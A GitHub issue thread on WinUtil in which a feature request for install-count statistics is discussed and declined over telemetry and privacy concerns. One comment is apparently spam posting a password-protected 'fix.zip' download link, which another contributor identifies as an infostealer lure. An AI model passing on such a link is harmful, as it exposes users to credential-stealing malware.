### ISSUE TITLE
Stats numbers show in UI

### ISSUE THREAD

**Issue by Destroyarr** [ChrisTitusTech/winutil#2635] opened 2024-08-28 05:53 UTC
Problem

Need global install numbers for apps. Add a counter after the app name.

Solution

Count installs and update in a free database or GitHub. Allows for future stats.

Alternatives

Being blind to how many installs each app gets.

Additional Context

Helps developers understand user needs. Stats can be recorded per country. Statistics are important.

**Comment by cnhbliyou** [comment] 2024-08-28 05:55
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by CodingWonders** [comment] 2024-08-28 11:04
What @Destroyarr was trying to say is that **you should stay informed of the latest in cybersecurity and avoid these types of links that promote "fixes" that are just infostealers**.

Now, I'm fed up with these pieces of malware, especially this week, when I've seen them on this repo every passing day. I have a feeling that these accounts are either spam accounts, or have been hacked by the same or another infostealer; but who knows. I hope that this ends soon.

**Comment by og-mrk** [comment] 2024-08-28 13:49
Hello @Destroyarr & thanks for opening this Feature Request,
Before we continue this discussion, I'd like to ask a few questions about it if you don't mind. Now onto the questions:
1. What do you mean by "global" install number? do you mean how many times an app was installed by WinUtil users?
2. also can you give examples on "more stats"? which's shown in your statement:
   "_because once you start showing stats, you will probably want to add more stats._"
3. so the main goal of this feature is the ability to search by popularity, correct? as stated in your statement:
   "_**Custom researching app popularity** which takes much much longer._"
   If so.. do you've anything in mind to achieve a similar goal _without_ doing your suggested solution?

Beside the above questions, there isn't anything else I've in mind at the moment, answering them with honesty will provide good feedback on this idea of yours, which'll then shape how we could integrate it into WinUtil. Thanks in advance 😄


<details><summary>P.S. (Click to expand)</summary>
<p>

These question are asked out of consider of possible issues that may (or may not) arise from adding this feature.. it's, from its basic elements.. Collecting Telemetry Data from WinUtil users, which's something we don't want to add!

This was also discussed by Regular contributors (like @MyDrift-user , @Marterich , and myself included) on idea of "should we add it (Telemetry) in the first place?".. from a security stand-point, it was too much pressure to do, as we didn't want to accidently send private info about WinUtil users.. not to mention that the data will be open (at least, this's preferred)... and the main reason behind this discussion on adding Telemetry was just "How can we 100% know that our changes (tweaks / featyre updates) work as intended.. _without_ Telemetry?".. short answer is no, you can't do achieve 100% certainty about your changes _**without**_ Telemetry, even if it'll slow development down, as we're literary "blind-folded" about bugs in WinUtil, so we don't know if the software is rock solid or not... so we agreed to rely on _only_ User feedback through GitHub Issues.

Hope this clears things up, as what you're asking us to do (from what I've understood), is to add Telemetry into WinUtil, even if it was very simple stats collections, like how many successful starts of WinUtil, how many times a Tweak was ran, or an app was installed.. but it's still considered Telemetry, and some people won't like it just because of this.

</p>
</details>

**Comment by Marterich** [comment] 2024-08-28 19:53
Hey all, 
Ignoring all the potential ideological problems with collecting telemetry in the first time, the following will focus on the technical difficulties 

The idea behind collecting click counts at first glance seems simple. "When a button is pressed, call an API that increments a counter.", but if you start thinking about implementations in regards to an open source script are quite tricky. 
For example
- how can spammers or trolls be prevented from just replaying the same web request over and over and therefore making the stats completely wrong/useless 
- rate limiting and ordering by country is quite tricky if you aren't allowed to store the IP (which also considered as PII) 

The problem with the counters is, that because we don't host any of the software ourselves, we don't have any metric of "real" download counts and therefore cannot really differentiate between the garbage requests and because the software is fully open source we cannot really authenticate the script/system without collecting quite a lot more system info than I would be comfortable.

I'm actually wondering how other open source projects solved these issues. If someone has any clue, I'm genuinely curious :) 

All in all, I think the infrastructure that would need to be set up to facilitate the counters in the first place, doesn't really make sense if we take a look at the scope of the project at the time

**Comment by Marterich** [comment] 2024-09-01 15:16
Seeing that there isn't anything to add or do with this Issue, I will close it. Thanks all for the discussion 
/close

**Closed** 2024-09-01 15:16 UTC
